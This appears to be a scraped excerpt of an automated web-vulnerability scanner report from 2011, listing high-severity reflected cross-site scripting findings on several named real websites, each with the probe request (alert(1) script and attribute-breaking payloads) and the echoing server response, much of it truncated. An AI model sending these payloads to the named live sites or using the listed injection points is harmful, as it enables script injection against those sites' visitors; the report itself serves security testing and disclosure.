HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/1/1581270199/ |
GET /9154d"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:46 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/9154d"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/1/1581270199/ |
GET /f20a6"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:42 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/3/882857095/ |
GET /ee14a"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:22 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/6/3/882857095/ |
GET /8de4c"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:48:26 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:48:26 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/8de4c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/1/52531776/ |
GET /c8c8a"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:50 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13466 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/1/52531776/ |
GET /23776"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:53 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13396 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/23776"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/3/1777313403/ |
GET /5ae45"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:07 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:07 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13474 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/7/3/1777313403/ |
GET /e2e0c"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:12 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:12 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13404 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/e2e0c"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/1/585997419/ |
GET /c9666"><script>alert(1)< Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:44 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:44 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/1/585997419/ |
GET /4ab87"-alert(1)- Host: advertising.aol.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://advertising.aol Cookie: s_vi=[CS]v1|2722E805 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 17:16:47 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 17:16:48 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/4ab87"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/3/144927758/ |
GET /5bd70"-alert(1)- Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:17 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:17 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13400 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... r s_265=s_gi('aolamn,aolsvc s_265.linkTrackVars= s_265.linkTrackEvents= s_265.events="prodView"; s_265.products='aolad s_265.eVar1="/5bd70"-alert(1)- s_265.tl(this,'o','aol ad simple contact'); } function runOmni() { s_265.pfxID="adv"; s_265.pageName="Main"; s_265.channel="us.aolad"; s_265.linkInternalFilters ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://advertising.aol |
Path: | /token/8/3/144927758/ |
GET /22ce9"><script>alert(1)< Host: advertising.aol.com Proxy-Connection: keep-alive Referer: http://advertising.aol User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|27329332 |
HTTP/1.1 404 Not Found Date: Sat, 17 Sep 2011 16:49:11 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sat, 17 Sep 2011 16:49:11 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Content-Type: text/html; charset=utf-8 Content-Length: 13470 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <m ...[SNIP]... <link rel="canonical" href="http://advertising ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:38:46 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b103.dl Content-Type: text/html Content-Length: 12165 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... eyClickthru = 1; } DL_Close(false); window.top.location.href= } function DL_Close(adscout) { if (typeof adscout == 'undefined' || adscout == true) { DL_Adscout(adsc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:00 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b202.dl Content-Type: text/html Content-Length: 12193 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... t); } // Set a flag so animation loop will stop running DL_ScrollState = 2; DL_Scroll(); } function DL_Adscout(adscout) { (new Image).src="//amch } function DL_Add(){ DL_InsertSwf(); } function DL_FlashInstalled() { // Detect swf plugin. var result = false; if (navigator.m ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/d_layer.php |
GET /adscgen/d_layer.php?sub Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:00 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b101.dl Content-Type: text/html Content-Length: 12193 var DL_HideSelects = true; var DL_HideObjects = false; var DL_HideIframes = false; var DL_Banner; // Will be bound to the DIV element representing the layer var DL_ScrollState = 0; var DL_width; var D ...[SNIP]... DL_SurveyClickthru = 1; } DL_Close(false); window.top.location.href= } function DL_Close(adscout) { if (typeof adscout == 'undefined' || adscout == true) { DL ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:07 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b101.dl Set-Cookie: LP=1316277547; expires=Wed, 21 Sep 2011 20:39:07 GMT; path=/; domain=.questionmarket Content-Length: 2445 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... } df=biggestframe; } d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:40:24 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b201.dl Set-Cookie: LP=1316277624; expires=Wed, 21 Sep 2011 20:40:24 GMT; path=/; domain=.questionmarket Content-Length: 2448 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) {} dle.type="text/jav ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://amch.question |
Path: | /adscgen/dynamiclink.js |
GET /adscgen/dynamiclink.js Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://www.kaboodle.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CS1=931683-4-1_20021 |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:39:34 GMT Server: Apache/2.2.3 X-Powered-By: PHP/4.4.4 Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch DL_S: b102.dl Set-Cookie: LP=1316277574; expires=Wed, 21 Sep 2011 20:39:34 GMT; path=/; domain=.questionmarket Content-Length: 2447 Content-Type: text/html (function(){ var d=document,w=window,dle; function ff(){ var p=w.parent,r; while (p != top) { try { if (p.location.host == w.location.host) r = p.document.referrer; } catch (e) { } p = p.paren ...[SNIP]... } d=df.document; if (!df.DL_already_ran){ dle=d.createElement( dle.src='http://amch try { if (dle.src.search('d_layer' dle.src=dle.src.replace( } } catch (e) {} dle.type="text/javas ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.uproxx.com |
Path: | /ulink/feed |
GET /ulink/feed?pid=1639e64b<img%20src%3da Host: api.uproxx.com Proxy-Connection: keep-alive Referer: http://www.ugo.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 16:14:57 GMT Server: Apache Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Content-Length: 5055 UPROXXJSON( [{"category":"TV \/ Movie News","content_title": ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 483 Content-Length: 483 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:38 GMT Date: Sat, 17 Sep 2011 16:23:38 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j180cc"-alert(1)- var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type='t ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 459 Content-Length: 459 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:36 GMT Date: Sat, 17 Sep 2011 16:23:36 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptge2c76"-alert(1)- var action; validRequest = false; if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.zap2it.com |
Path: | /tvlistings/zcConnector |
GET /tvlistings/zcConnector Host: api.zap2it.com Proxy-Connection: keep-alive Referer: http://www.seattlepi.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Cteonnt-Length: 486 Content-Length: 486 Cache-Control: max-age=900 Expires: Sat, 17 Sep 2011 16:38:40 GMT Date: Sat, 17 Sep 2011 16:23:40 GMT Connection: close Vary: Accept-Encoding var validRequest = true; var server = "http://api.zap2it.com"; var requestParams = "ap=ptg&v=2&aid=f3j&zip var action; action = "/tvlistings/ZCPrime if(requestParams!="" && validRequest) { document.write("<scr" + "ipt "); document.write("type= ...[SNIP]... |
Severity: | High |
